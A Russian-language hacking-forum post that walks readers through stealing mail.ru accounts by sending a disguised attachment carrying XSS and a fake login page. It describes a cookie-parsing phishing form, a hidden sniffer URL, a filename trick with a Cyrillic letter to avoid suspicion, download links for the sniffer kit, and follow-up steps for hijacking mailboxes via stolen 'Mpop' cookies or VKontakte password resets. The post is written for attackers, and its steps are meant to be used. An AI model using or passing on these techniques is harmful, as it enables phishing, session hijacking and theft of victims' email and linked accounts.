Всем привет
Возможно байан, и всёже...
XSS нашёл не я, нашёл вот кто http://webxakep.net/articles/articles-internet/1601-krazha-cookies-na-mail.ru.html но там описана тупо XSS а мы сейчас додумаем сами, как сделать всё поумнее...
/*Кстати хочу сказать что почему-то не у всех это работает, у некоторых при отправке атача <script> заменяется на <xscript> возможно это зависит от браузера, у меня опера 9.62 и всё норм*/
Дальше идёт строго моя импровизация
С XSS проблем не будет, надо подумать насчёт фейка... Мы будем выводить страницу входа, надо чтобы мыло отображалось в поле "Имя" ну как стандартный мэйловский вход, для этого надо отпарсить куку "Mpop". Быстро в гуголе нашёл скрипт и взялся за работу
/*Час спустя
*/
Сделал, из кук читается логин, домен и вводится в форму, также при нажатии на кнопку сабмита изменяется action формы, чтобы в опере не палился сниффер при наводе на кнопку
URL сниффера надо прописать в функцию x3k_get_action() - найдёте её через Ctrl+F
(это файл фото)
Автор статьи что я указал выше рекомендует использовать имя файла с расширением .img но это палево, хоть и не большое, но палево, и зачем палиться если этого можно избежать. Способ прибежал в голову секунда за 15
Изменяем формат файла на .jpg Но буква p это не английская ПЭ а русская ЭР, таким образом всё хорошо
Но вы возможно придумаете для экономии времени такой способ - заходить в "Отправленные" и перенаправлять время следующей жертве, не советую... При первой отправке если мы отправили "фото.jpg" то он так и придёт жертве, а при перенаправке он превратиться в "foto.jrg" а нам этого не надо, поэтому пишите каждый раз письмо заново.
Код:
http://rapidshare.com/files/171369388/mail.ru_sniff_fake.rar.html
http://depositfiles.com/files/rbmgdj9vw
А архиве 4 файла
.htaccess - запрещает доступ к логу из веба
mail-sniffer.log - сюда будут идти куки с XSS и данные с фейка
mail-sniffer.php - сам сниффер который всё обрабатывает
S000001436.jрg - "кагбе" фотография.
Она весит 22кб, если вам кажется этого мало для фотографии, можете дополнить текстом
Код HTML:
<noscript><!-- много разного мусора на пару десятков/сотен кб --></noscript>
Чёт я ещё хотел сказать... Забыл, вспомню скажу
А! Вспомнил! Если жертва не повелась на фейк, пришли только куки, не всё потеряно, прём на вконтакт (все знают что это, не надо объяснять?) высылаем пасс на мыло (98% жертв зареганы на вконтакте) нам приходит пасс, в 85% случаев пасс подходит к мылу, если не на вконтакте, порыскайте почту, должны быть письма с разными регистрациями и высыланиями паролей
Ах да! Ещё! Если пришли только куки, то удаляйте всё кроме "Mpop" эта кука самая главная и с её помощью вы сможете лазить по всем сервисам mail.ru (чаты, знакомства, игры) если вы оставите ещё какую-то куку то есть вероятность что куда-то вас не пустят
А! Ещё! В PHP скрипте сниффера защита от школьников, так что не забудьте поправить
Ага! Ещё! Зайдите в "фотографию" и в функции "x3k_get_action()" измените URL сниффера
Ну и ещё... На файл mail-sniffer.log должны быть права на запись
Вроде-бы всё
Видео тем кто не догнал
Код:
http://rapidshare.com/files/171401947/mail.ru_xss_sniff.rar.html
http://depositfiles.com/files/rscltc8se
(c)Ponchik - forum.antichat.ru
mail.ru: XSS + фейк (2 в 1)
Линейный вид
